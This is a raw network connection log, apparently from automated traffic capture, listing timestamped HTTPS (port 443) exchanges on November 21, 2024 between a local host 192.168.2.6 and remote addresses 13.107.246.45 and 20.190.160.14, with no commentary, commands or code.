                                                                                                                                                                                                            Nov 21, 2024 15:18:40.003854990 CET4434999713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.026787043 CET4434999413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.029392958 CET4434999413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.029629946 CET49994443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.049133062 CET4434999613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.049159050 CET4434999613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.049217939 CET4434999613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.049257040 CET49996443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.049304962 CET49996443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.052229881 CET49994443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.052229881 CET49994443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.052248955 CET4434999413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.052259922 CET4434999413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.053231001 CET49996443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.053246021 CET4434999613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.053261042 CET49996443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.053266048 CET4434999613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.154048920 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.154099941 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.154195070 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.166726112 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.166769028 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.166794062 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.166815042 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.166881084 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.166938066 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.166943073 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.450522900 CET4434999713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.453396082 CET4434999713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.453453064 CET4434999713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.453480005 CET49997443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.453547001 CET49997443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.453588963 CET49997443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.453634977 CET4434999713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.453669071 CET49997443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.453686953 CET4434999713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.456650019 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.456698895 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.456912041 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.457103014 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:40.457110882 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.206810951 CET4434999813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.207365990 CET49998443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.207393885 CET4434999813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.207825899 CET49998443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.207830906 CET4434999813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.667917013 CET4434999813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.670991898 CET4434999813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.671075106 CET49998443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.671310902 CET49998443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.671329975 CET4434999813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.671416044 CET49998443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.671422005 CET4434999813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.674433947 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.674463034 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.674523115 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.674705982 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.674719095 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.712943077 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.713433027 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.713466883 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.713937998 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.713946104 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.971266985 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.971832991 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.971843958 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.972393036 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.972398043 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.974052906 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.974659920 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.974672079 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.975146055 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:41.975152969 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.030087948 CET49702443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.150796890 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.151612997 CET4434970220.190.160.14192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.151690960 CET49702443192.168.2.620.190.160.14
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.156524897 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.156584978 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.156656981 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.156713009 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.156770945 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.156801939 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.156831980 CET49999443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.156847954 CET4434999913.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.159884930 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.159938097 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.160096884 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.160285950 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.160312891 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.246198893 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.246948957 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.246963024 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.247615099 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.247621059 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.415409088 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.418143034 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.418709040 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.418812990 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.418828964 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.418848038 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.418899059 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.418921947 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.418939114 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.418948889 CET50001443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.418955088 CET4435000113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.421256065 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.421385050 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.437469959 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.437503099 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.437515974 CET50000443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.437524080 CET4435000013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.449314117 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.449352980 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.449409962 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.450936079 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.450973034 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.451227903 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.451241970 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.451265097 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.451785088 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.451806068 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.757985115 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.761142969 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.761220932 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.761414051 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.761432886 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.761445045 CET50002443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.761451006 CET4435000213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.777384996 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.777431965 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.777503014 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.777802944 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:42.777812958 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.532915115 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.533446074 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.533482075 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.533977032 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.533982992 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.960092068 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.964111090 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.964128017 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.964863062 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.964868069 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.990083933 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.993196011 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.993261099 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.993292093 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.993366957 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.993366957 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.993444920 CET50003443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.993464947 CET4435000313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.996059895 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.996105909 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.996198893 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.996364117 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:43.996376038 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.171684980 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.172283888 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.172347069 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.172713041 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.172729015 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.184355974 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.184758902 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.184779882 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.185272932 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.185278893 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.407763004 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.410824060 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.410883904 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.410945892 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.410964966 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.410975933 CET50004443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.410981894 CET4435000413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.413817883 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.413863897 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.413938046 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.414140940 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.414158106 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.601896048 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.602392912 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.602436066 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.602854013 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.602859974 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.614619970 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.617794037 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.617871046 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.617913961 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.617933989 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.617944956 CET50006443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.617950916 CET4435000613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.620521069 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.620572090 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.620937109 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.621084929 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.621098042 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.627082109 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.630036116 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.630151987 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.630161047 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.630511045 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.630570889 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.630589008 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.630603075 CET50005443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.630609989 CET4435000513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.632811069 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.632841110 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.632941008 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.633064985 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:44.633076906 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.046709061 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.049406052 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.049468994 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.058204889 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.058234930 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.058250904 CET50007443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.058258057 CET4435000713.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.065992117 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.066036940 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.066118002 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.066389084 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.066406012 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.723562956 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.724018097 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.724061012 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.724478960 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:45.724484921 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.161494970 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.161581039 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.161638975 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.161647081 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.161726952 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.161868095 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.161885977 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.161895990 CET50008443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.161901951 CET4435000813.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.164815903 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.164861917 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.164930105 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.165102959 CET50014443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.165112019 CET4435001413.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.196202993 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.196671009 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.196688890 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.197118044 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.197123051 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.356806040 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.357304096 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.357335091 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.357752085 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.357758999 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.414798975 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.415282965 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.415323019 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.415707111 CET50011443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.415712118 CET4435001113.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.640465975 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.643553019 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.643691063 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.643742085 CET50010443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.643754959 CET4435001013.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.647084951 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.647133112 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.647209883 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.647449017 CET50015443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.647464991 CET4435001513.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.840708017 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.843760014 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.843820095 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.843871117 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.843909979 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.843985081 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.844005108 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.844017982 CET50012443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.844023943 CET4435001213.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.847026110 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.847057104 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.847223043 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.847354889 CET50016443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.847363949 CET4435001613.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.856403112 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.856914043 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.856956005 CET4435001313.107.246.45192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.857341051 CET50013443192.168.2.613.107.246.45
                                                                                                                                                                                                            Nov 21, 2024 15:18:46.857347965 CET4435001313.107.246.45192.168.2.6
